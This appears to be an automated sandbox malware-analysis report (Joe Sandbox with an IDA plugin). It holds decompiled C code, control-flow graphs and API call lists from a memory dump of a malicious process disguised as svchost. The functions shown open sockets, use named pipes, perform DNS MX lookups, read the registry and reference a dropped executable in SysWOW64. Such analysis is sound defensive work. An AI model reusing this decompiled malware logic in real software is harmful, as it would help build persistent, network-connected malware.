                                                                                0x0012690d
                                                                                0x00126920
                                                                                0x00000000
                                                                                0x00126922
                                                                                0x0012694f
                                                                                0x00126955
                                                                                0x00126955
                                                                                0x00126920
                                                                                0x0012690b
                                                                                0x001268fe
                                                                                0x001268df
                                                                                0x00126861
                                                                                0x00126842
                                                                                0x00126824
                                                                                0x0012680b
                                                                                0x00126971
                                                                                0x00126971
                                                                                0x0012697f
                                                                                0x00126986

                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,74CB43E0,00000000), ref: 0012677E
                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,74CB43E0,00000000), ref: 0012679A
                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,74CB43E0,00000000), ref: 001267B0
                                                                                • SetFileAttributesA.KERNEL32(?,00000002,?,74CB43E0,00000000), ref: 001267BF
                                                                                • GetFileSize.KERNEL32(000000FF,00000000,?,74CB43E0,00000000), ref: 001267D3
                                                                                • ReadFile.KERNEL32(000000FF,?,00000040,00128244,00000000,?,74CB43E0,00000000), ref: 00126807
                                                                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0012681F
                                                                                • ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,74CB43E0,00000000), ref: 0012683E
                                                                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0012685C
                                                                                • ReadFile.KERNEL32(000000FF,?,00000028,00128244,00000000,?,74CB43E0,00000000), ref: 0012688B
                                                                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,74CB43E0,00000000), ref: 00126906
                                                                                • ReadFile.KERNEL32(000000FF,?,00000000,00128244,00000000,?,74CB43E0,00000000), ref: 0012691C
                                                                                • FindCloseChangeNotification.KERNEL32(000000FF,?,74CB43E0,00000000), ref: 00126971
                                                                                  • Part of subcall function 0012EC2E: GetProcessHeap.KERNEL32(00000000,0012EA27,00000000,0012EA27,00000000), ref: 0012EC41
                                                                                  • Part of subcall function 0012EC2E: RtlFreeHeap.NTDLL(00000000), ref: 0012EC48
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
                                                                                • String ID:
                                                                                • API String ID: 1400801100-0
                                                                                • Opcode ID: 41d5442c1e6f6c29ab588d3b10062f61c8c308ee4268725cbb5e3175b6d35d4c
                                                                                • Instruction ID: 6edd5c3f4f12c9baf379f89ad21dcd4dc1a07361f92bf535e3b4a27ca85077f3
                                                                                • Opcode Fuzzy Hash: 41d5442c1e6f6c29ab588d3b10062f61c8c308ee4268725cbb5e3175b6d35d4c
                                                                                • Instruction Fuzzy Hash: 32711AB1D0022DEFDF159FA4DC809EEBBB9FB04354F10456AE515A6190E7309EA2DB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012F315 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1159 12f315-12f332 1160 12f334-12f336 1159->1160 1161 12f33b-12f372 call 12ee2a htons socket 1159->1161 1162 12f424-12f427 1160->1162 1165 12f382-12f39b ioctlsocket 1161->1165 1166 12f374-12f37d closesocket 1161->1166 1167 12f3aa-12f3f0 connect select 1165->1167 1168 12f39d 1165->1168 1166->1162 1170 12f3f2-12f401 __WSAFDIsSet 1167->1170 1171 12f421 1167->1171 1169 12f39f-12f3a8 closesocket 1168->1169 1172 12f423 1169->1172 1170->1169 1173 12f403-12f416 ioctlsocket call 12f26d 1170->1173 1171->1172 1172->1162 1175 12f41b-12f41f 1173->1175 1175->1172
                                                                                APIs
                                                                                • htons.WS2_32(0012CA1D), ref: 0012F34D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0012F367
                                                                                • closesocket.WS2_32(00000000), ref: 0012F375
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesockethtonssocket
                                                                                • String ID: time_cfg
                                                                                • API String ID: 311057483-2401304539
                                                                                • Opcode ID: 8562494fdf592769789cd437eed5c55b067e2936638353dd8dd3fd9b33ba6189
                                                                                • Instruction ID: e373c6d1fa51fb84b097626a3233eb9e6ab6072eeb234409b8c96e3da68f302d
                                                                                • Opcode Fuzzy Hash: 8562494fdf592769789cd437eed5c55b067e2936638353dd8dd3fd9b33ba6189
                                                                                • Instruction Fuzzy Hash: 1C316D76900128ABDB11DFA5EC859EF7BFCFF48314F10417AF915E2150E7709A928BA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012405E Relevance: 16.7, APIs: 11, Instructions: 203COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1176 12405e-12407b CreateEventA 1177 124084-1240a8 call 123ecd call 124000 1176->1177 1178 12407d-124081 1176->1178 1183 124130-12413e call 12ee2a 1177->1183 1184 1240ae-1240be call 12ee2a 1177->1184 1189 12413f-124165 call 123ecd CreateNamedPipeA 1183->1189 1184->1183 1190 1240c0-1240f1 call 12eca5 call 123f18 call 123f8c 1184->1190 1195 124167-124174 Sleep 1189->1195 1196 124188-124193 ConnectNamedPipe 1189->1196 1208 1240f3-1240ff 1190->1208 1209 124127-12412a CloseHandle 1190->1209 1195->1189 1198 124176-124182 CloseHandle 1195->1198 1200 124195-1241a5 GetLastError 1196->1200 1201 1241ab-1241c0 call 123f8c 1196->1201 1198->1196 1200->1201 1203 12425e-124265 DisconnectNamedPipe 1200->1203 1201->1196 1207 1241c2-1241f2 call 123f18 call 123f8c 1201->1207 1203->1196 1207->1203 1217 1241f4-124200 1207->1217 1208->1209 1211 124101-124121 call 123f18 ExitProcess 1208->1211 1209->1183 1217->1203 1218 124202-124215 call 123f8c 1217->1218 1218->1203 1221 124217-12421b 1218->1221 1221->1203 1222 12421d-124230 call 123f8c 1221->1222 1222->1203 1225 124232-124236 1222->1225 1225->1196 1226 12423c-124251 call 123f18 1225->1226 1229 124253-124259 1226->1229 1230 12426a-124276 CloseHandle * 2 call 12e318 1226->1230 1229->1196 1232 12427b 1230->1232 1232->1232
                                                                                C-Code - Quality: 98%
                                                                                			E0012405E(void* __ecx) {
				unsigned int _v8;
				unsigned int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				void* _t40;
				void* _t43;
				void* _t46;
				int _t47;
				void* _t49;
				void* _t56;
				void* _t62;
				void* _t64;
				long _t71;
				void* _t82;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t104;

				_t95 = __ecx;
				_v8 = 0;
				_t40 = CreateEventA(0, 1, 1, 0);
				_v16 = _t40;
				if(_t40 != 0) {
					_t43 = E00124000(E00123ECD(_t95),  &_v20);
					_t97 = _t98;
					_t102 = 0x7d0;
					_t92 = 0x100;
					_t99 = 0x1322f8;
					if(_t43 == 0) {
						L10:
						E0012EE2A(_t97, _t99, 0, _t92);
						_t104 = _t103 + 0xc;
						_t93 = 0xa;
						while(1) {
							_t93 = _t93 - 1;
							_t46 = CreateNamedPipeA(E00123ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0); // executed
							_t99 = _t46;
							if(_t99 != 0xffffffff) {
								goto L14;
							}
							Sleep(0x1f4);
							if(_t93 != 0) {
								continue;
							}
							CloseHandle(_v16);
							return 0;
						}
						while(1) {
							L14:
							_t47 = ConnectNamedPipe(_t99, 0); // executed
							if(_t47 != 0) {
								goto L16;
							}
							L15:
							_t71 = GetLastError();
							asm("sbb eax, eax");
							if( ~(_t71 - 0x217) + 1 == 0) {
								L25:
								DisconnectNamedPipe(_t99);
								continue;
								do {
									while(1) {
										L14:
										_t47 = ConnectNamedPipe(_t99, 0); // executed
										if(_t47 != 0) {
											goto L16;
										}
										goto L15;
									}
									L22:
								} while (_v28 != 1);
								E00123F18(_t99,  &_v8, 4, _t92, _t102);
								_t103 = _t104 + 0x14;
								if(_v32 == 0) {
									_t102 = CloseHandle;
									CloseHandle(_t99);
									CloseHandle(_t92);
									E0012E318();
									L8:
									ExitProcess(0);
								}
								 *0x13215a =  *0x13215a + 1;
								do {
									L14:
									_t47 = ConnectNamedPipe(_t99, 0); // executed
									if(_t47 != 0) {
										goto L16;
									}
									goto L15;
								} while (_t49 == 0);
								_t92 = _v16;
								_v8 = (_v12 >> 2) + _v12;
								E00123F18(_t99,  &_v8, 4, _t92, _t102);
								_t56 = E00123F8C(_t99,  &_v12, 4, _t92, _t102);
								_t104 = _t104 + 0x28;
								if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
									goto L25;
								} else {
									_t62 = E00123F8C(_t99,  &_v28, 8, _t92, _t102);
									_t104 = _t104 + 0x14;
									if(_t62 == 0 || _v24 != 0xc) {
										goto L25;
									} else {
										_t64 = E00123F8C(_t99,  &_v40, 0xc, _t92, _t102);
										_t104 = _t104 + 0x14;
										if(_t64 == 0) {
											goto L25;
										}
										goto L22;
									}
								}
							}
							L16:
							_t49 = E00123F8C(_t99,  &_v12, 4, _v16, _t102);
							_t104 = _t104 + 0x14;
						}
					}
					E0012EE2A(_t97, 0x1322f8, 0, 0x100);
					_t103 = _t103 + 0xc;
					if(_v20 == 0xffffffff) {
						goto L10;
					}
					_v12 = E0012ECA5();
					E00123F18(_v20,  &_v12, 4, _v16, 0x7d0);
					_t82 = E00123F8C(_v20,  &_v8, 4, _v16, 0x7d0);
					_t103 = _t103 + 0x28;
					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
						CloseHandle(_v20);
						goto L10;
					} else {
						_v8 = _v8 + (_v8 >> 2);
						E00123F18(_v20,  &_v8, 4, _v16, 0x7d0);
						_t103 = _t103 + 0x14;
						goto L8;
					}
				}
				return 0;
			}





























                                                                                0x0012405e
                                                                                0x0012406d
                                                                                0x00124070
                                                                                0x00124076
                                                                                0x0012407b
                                                                                0x00124090
                                                                                0x00124096
                                                                                0x00124097
                                                                                0x0012409c
                                                                                0x001240a1
                                                                                0x001240a8
                                                                                0x00124130
                                                                                0x00124134
                                                                                0x00124139
                                                                                0x0012413e
                                                                                0x0012413f
                                                                                0x00124153
                                                                                0x0012415a
                                                                                0x00124160
                                                                                0x00124165
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012416c
                                                                                0x00124174
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00124179
                                                                                0x00000000
                                                                                0x00124182
                                                                                0x00124188
                                                                                0x00124188
                                                                                0x0012418b
                                                                                0x00124193
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00124195
                                                                                0x00124195
                                                                                0x001241a2
                                                                                0x001241a5
                                                                                0x0012425e
                                                                                0x0012425f
                                                                                0x00124265
                                                                                0x00124188
                                                                                0x00124188
                                                                                0x00124188
                                                                                0x0012418b
                                                                                0x00124193
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00124193
                                                                                0x00124232
                                                                                0x00124232
                                                                                0x00124245
                                                                                0x0012424a
                                                                                0x00124251
                                                                                0x0012426a
                                                                                0x00124271
                                                                                0x00124274
                                                                                0x00124276
                                                                                0x0012411f
                                                                                0x00124121
                                                                                0x00124121
                                                                                0x00124253
                                                                                0x00124188
                                                                                0x00124188
                                                                                0x0012418b
                                                                                0x00124193
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00124193
                                                                                0x001241c5
                                                                                0x001241d0
                                                                                0x001241da
                                                                                0x001241e8
                                                                                0x001241ed
                                                                                0x001241f2
                                                                                0x00000000
                                                                                0x00124202
                                                                                0x0012420b
                                                                                0x00124210
                                                                                0x00124215
                                                                                0x00000000
                                                                                0x0012421d
                                                                                0x00124226
                                                                                0x0012422b
                                                                                0x00124230
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00124230
                                                                                0x00124215
                                                                                0x001241f2
                                                                                0x001241ab
                                                                                0x001241b6
                                                                                0x001241bb
                                                                                0x001241be
                                                                                0x00124188
                                                                                0x001240b2
                                                                                0x001240b7
                                                                                0x001240be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001240c9
                                                                                0x001240d5
                                                                                0x001240e7
                                                                                0x001240ec
                                                                                0x001240f1
                                                                                0x0012412a
                                                                                0x00000000
                                                                                0x00124101
                                                                                0x0012410b
                                                                                0x00124117
                                                                                0x0012411c
                                                                                0x00000000
                                                                                0x0012411c
                                                                                0x001240f1
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00124070
                                                                                • ExitProcess.KERNEL32 ref: 00124121
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEventExitProcess
                                                                                • String ID:
                                                                                • API String ID: 2404124870-0
                                                                                • Opcode ID: ce8f107f529c39fb425e07ea1e29eb136ab2c512d508ea0b5ca89ed9879828e0
                                                                                • Instruction ID: 1ab1aef9cd2c67597eaa0ceab913bf642c23d8f19e1537b79c35ee9594b8be54
                                                                                • Opcode Fuzzy Hash: ce8f107f529c39fb425e07ea1e29eb136ab2c512d508ea0b5ca89ed9879828e0
                                                                                • Instruction Fuzzy Hash: D951A4B1D00228BBEB11ABA0BD85FBF7BBCEF25754F000055F615A6080E7349E61C7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00122D21 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85memorylibrarystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1233 122d21-122d44 GetModuleHandleA 1234 122d46-122d52 LoadLibraryA 1233->1234 1235 122d5b-122d69 GetProcAddress 1233->1235 1234->1235 1236 122d54-122d56 1234->1236 1235->1236 1237 122d6b-122d7b DnsQuery_A 1235->1237 1239 122dee-122df1 1236->1239 1237->1236 1238 122d7d-122d88 1237->1238 1240 122d8a-122d8b 1238->1240 1241 122deb 1238->1241 1242 122d90-122d95 1240->1242 1241->1239 1243 122de2-122de8 1242->1243 1244 122d97-122daa GetProcessHeap HeapAlloc 1242->1244 1243->1242 1245 122dea 1243->1245 1244->1245 1246 122dac-122dd9 call 12ee2a lstrcpynA 1244->1246 1245->1241 1249 122de0 1246->1249 1250 122ddb-122dde 1246->1250 1249->1243 1250->1243
                                                                                C-Code - Quality: 73%
                                                                                			E00122D21(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				char _v28;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				void* _t22;
				long* _t30;
				intOrPtr* _t37;
				long _t39;
				long _t40;
				void* _t41;

				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t19 = GetModuleHandleA( &_v28);
				_t39 = 0;
				if(_t19 != 0) {
					L3:
					_t20 = GetProcAddress(_t19, "DnsQuery_A");
					if(_t20 == _t39) {
						L2:
						return 0;
					}
					_t35 =  &_v16;
					_t22 =  *_t20(_a4, 0xf, _t39, _t39,  &_v16, _t39); // executed
					if(_t22 != 0) {
						goto L2;
					}
					_t37 = _v16;
					_v8 = _t39;
					_v12 = _t39;
					if(_t37 == _t39) {
						L14:
						return _v12;
					}
					do {
						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
						if(_t40 == 0) {
							break;
						}
						E0012EE2A(_t35, _t40, 0, 0x108);
						_t41 = _t41 + 0xc;
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40;
						} else {
							_v12 = _t40;
						}
						L12:
						_t37 =  *_t37;
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				_t19 = LoadLibraryA( &_v28);
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}















                                                                                0x00122d31
                                                                                0x00122d32
                                                                                0x00122d33
                                                                                0x00122d39
                                                                                0x00122d3a
                                                                                0x00122d40
                                                                                0x00122d44
                                                                                0x00122d5b
                                                                                0x00122d61
                                                                                0x00122d69
                                                                                0x00122d54
                                                                                0x00000000
                                                                                0x00122d54
                                                                                0x00122d6c
                                                                                0x00122d77
                                                                                0x00122d7b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122d7d
                                                                                0x00122d80
                                                                                0x00122d83
                                                                                0x00122d88
                                                                                0x00122deb
                                                                                0x00000000
                                                                                0x00122deb
                                                                                0x00122d90
                                                                                0x00122d95
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122da6
                                                                                0x00122daa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122db0
                                                                                0x00122db9
                                                                                0x00122dc1
                                                                                0x00122dc7
                                                                                0x00122dcb
                                                                                0x00122dd1
                                                                                0x00122dd4
                                                                                0x00122dd9
                                                                                0x00122de0
                                                                                0x00122ddb
                                                                                0x00122ddb
                                                                                0x00122ddb
                                                                                0x00122de2
                                                                                0x00122de2
                                                                                0x00122de4
                                                                                0x00122de6
                                                                                0x00000000
                                                                                0x00122dea
                                                                                0x00122d4a
                                                                                0x00122d52
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00122F01,?,001220FF,00132000), ref: 00122D3A
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00122D4A
                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00122D61
                                                                                • DnsQuery_A.DNSAPI(00000000,0000000F,00000000,00000000,?,00000000), ref: 00122D77
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00122D99
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00122DA0
                                                                                • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00122DCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcessQuery_lstrcpyn
                                                                                • String ID: DnsQuery_A$dnsapi.dll
                                                                                • API String ID: 233223969-3847274415
                                                                                • Opcode ID: 50b1f336d6a1541d6cac276fe586e837427e081993eb256bcdcd432648487730
                                                                                • Instruction ID: 8cc47d659ef7fd9be1f872d9886c35d6b792566bb5f71bb5122299170f4ec0dd
                                                                                • Opcode Fuzzy Hash: 50b1f336d6a1541d6cac276fe586e837427e081993eb256bcdcd432648487730
                                                                                • Instruction Fuzzy Hash: 4E216D7190062ABBCB229FA4EC44AAEBBB8FF08B50F114051F905E7510D7B0AAA587D0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 001280C9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1251 1280c9-1280ed call 126ec3 1254 1280f9-128115 call 12704c 1251->1254 1255 1280ef call 127ee6 1251->1255 1260 128225-12822b 1254->1260 1261 12811b-128121 1254->1261 1259 1280f4 1255->1259 1259->1260 1262 12826c-128273 1260->1262 1263 12822d-128233 1260->1263 1261->1260 1264 128127-12812a 1261->1264 1263->1262 1265 128235-12823f call 12675c 1263->1265 1264->1260 1266 128130-128167 call 122544 RegOpenKeyExA 1264->1266 1269 128244-12824b 1265->1269 1272 128216-128222 call 12ee2a 1266->1272 1273 12816d-12818b RegQueryValueExA 1266->1273 1269->1262 1271 12824d-128269 call 1224c2 call 12ec2e 1269->1271 1271->1262 1272->1260 1275 1281f7-1281fe 1273->1275 1276 12818d-128191 1273->1276 1279 128200-128206 call 12ec2e 1275->1279 1280 12820d-128210 RegCloseKey 1275->1280 1276->1275 1281 128193-128196 1276->1281 1289 12820c 1279->1289 1280->1272 1281->1275 1285 128198-1281a8 call 12ebcc 1281->1285 1285->1280 1291 1281aa-1281c2 RegQueryValueExA 1285->1291 1289->1280 1291->1275 1292 1281c4-1281ca 1291->1292 1293 1281cd-1281d2 1292->1293 1293->1293 1294 1281d4-1281e5 call 12ebcc 1293->1294 1294->1280 1297 1281e7-1281f5 call 12ef00 1294->1297 1297->1289
                                                                                C-Code - Quality: 93%
                                                                                			E001280C9(int* __ecx) {
				int _v8;
				void* _v12;
				int _v16;
				char _v20;
				char _v52;
				char _v312;
				void* _t27;
				void* _t31;
				char* _t35;
				char* _t42;
				char* _t45;
				intOrPtr* _t49;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				void* _t68;
				char _t70;
				intOrPtr _t71;

				_t56 = __ecx;
				_v8 = 0;
				 *0x132c3c = 0;
				 *0x132c38 = 0;
				if(E00126EC3() != 0) {
					_t27 = E0012704C(0x130264, 0, 0,  &_v312,  &_v52);
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						_t35 = E00122544(0x1322f8,  &E001306AC, 0x2e, 0xe4, 0xc8);
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
							L19:
							E0012EE2A(_t56, 0x1322f8, 0, 0x100);
							_t65 = _t68 + 0xc;
							goto L20;
						}
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
							L15:
							_t42 =  *0x132c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0012EC2E(_t42);
							 *0x132c3c = 0;
							goto L17;
						} else {
							_t45 = E0012EBCC(_v8);
							_pop(_t56);
							 *0x132c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
								goto L19;
							}
							_t56 =  &_v8;
							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
								goto L15;
							}
							_t49 =  &_v312;
							_t60 = _t49 + 1;
							do {
								_t57 =  *_t49;
								_t49 = _t49 + 1;
							} while (_t57 != 0);
							_t52 = E0012EBCC(_t49 - _t60 + 1);
							_pop(_t56);
							 *0x132c38 = _t52;
							if(_t52 == 0) {
								goto L18;
							}
							E0012EF00(_t52,  &_v312);
							L17:
							_pop(_t56);
							goto L18;
						}
					}
				} else {
					E00127EE6(_t56); // executed
					L20:
					_t70 = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
					if(_t70 != 0) {
						_t71 =  *0x1321a4; // 0x30800
						if(_t71 == 0) {
							_t31 = E0012675C("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v20, 0); // executed
							_t61 = _t31;
							if(_t31 != 0) {
								_t63 = _v20;
								 *0x1322d4 = E001224C2(_t61, _t63, 0);
								 *0x1321a4 = _t63;
								E0012EC2E(_t61);
							}
						}
					}
					return 1;
				}
			}























                                                                                0x001280c9
                                                                                0x001280d7
                                                                                0x001280da
                                                                                0x001280e0
                                                                                0x001280ed
                                                                                0x0012810b
                                                                                0x00128110
                                                                                0x00128115
                                                                                0x00000000
                                                                                0x00128130
                                                                                0x00128151
                                                                                0x00128156
                                                                                0x00128167
                                                                                0x00128216
                                                                                0x0012821d
                                                                                0x00128222
                                                                                0x00000000
                                                                                0x00128222
                                                                                0x0012818b
                                                                                0x001281f7
                                                                                0x001281f7
                                                                                0x001281fe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00128201
                                                                                0x00128206
                                                                                0x00000000
                                                                                0x00128198
                                                                                0x0012819b
                                                                                0x001281a0
                                                                                0x001281a1
                                                                                0x001281a8
                                                                                0x0012820d
                                                                                0x00128210
                                                                                0x00000000
                                                                                0x00128210
                                                                                0x001281aa
                                                                                0x001281c2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001281c4
                                                                                0x001281ca
                                                                                0x001281cd
                                                                                0x001281cd
                                                                                0x001281cf
                                                                                0x001281d0
                                                                                0x001281d8
                                                                                0x001281dd
                                                                                0x001281de
                                                                                0x001281e5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001281ef
                                                                                0x0012820c
                                                                                0x0012820c
                                                                                0x00000000
                                                                                0x0012820c
                                                                                0x0012818b
                                                                                0x001280ef
                                                                                0x001280ef
                                                                                0x00128225
                                                                                0x00128225
                                                                                0x0012822b
                                                                                0x0012822d
                                                                                0x00128233
                                                                                0x0012823f
                                                                                0x00128244
                                                                                0x0012824b
                                                                                0x0012824d
                                                                                0x00128259
                                                                                0x0012825e
                                                                                0x00128264
                                                                                0x00128269
                                                                                0x0012824b
                                                                                0x00128233
                                                                                0x00128273
                                                                                0x00128273

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 0012815F
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0012A45F,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 00128187
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0012A45F,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 001281BE
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 00128210
                                                                                  • Part of subcall function 0012675C: SetFileAttributesA.KERNEL32(?,00000080,?,74CB43E0,00000000), ref: 0012677E
                                                                                  • Part of subcall function 0012675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,74CB43E0,00000000), ref: 0012679A
                                                                                  • Part of subcall function 0012675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,74CB43E0,00000000), ref: 001267B0
                                                                                  • Part of subcall function 0012675C: SetFileAttributesA.KERNEL32(?,00000002,?,74CB43E0,00000000), ref: 001267BF
                                                                                  • Part of subcall function 0012675C: GetFileSize.KERNEL32(000000FF,00000000,?,74CB43E0,00000000), ref: 001267D3
                                                                                  • Part of subcall function 0012675C: ReadFile.KERNEL32(000000FF,?,00000040,00128244,00000000,?,74CB43E0,00000000), ref: 00126807
                                                                                  • Part of subcall function 0012675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0012681F
                                                                                  • Part of subcall function 0012675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,74CB43E0,00000000), ref: 0012683E
                                                                                  • Part of subcall function 0012675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0012685C
                                                                                  • Part of subcall function 0012EC2E: GetProcessHeap.KERNEL32(00000000,0012EA27,00000000,0012EA27,00000000), ref: 0012EC41
                                                                                  • Part of subcall function 0012EC2E: RtlFreeHeap.NTDLL(00000000), ref: 0012EC48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe
                                                                                • API String ID: 124786226-2070294517
                                                                                • Opcode ID: a808bc832e599ca54025d3dd822468e057cd106567c1b976eebdabddec736280
                                                                                • Instruction ID: 10892c9b0496fbbfce8147487e827a683b202c0e73223f1625e3b5019780e5bd
                                                                                • Opcode Fuzzy Hash: a808bc832e599ca54025d3dd822468e057cd106567c1b976eebdabddec736280
                                                                                • Instruction Fuzzy Hash: A84192B2902129BFEB11FBA0BD81DBE77BCEB24304F14446AF505E2051EB705EA5CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00121AC3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
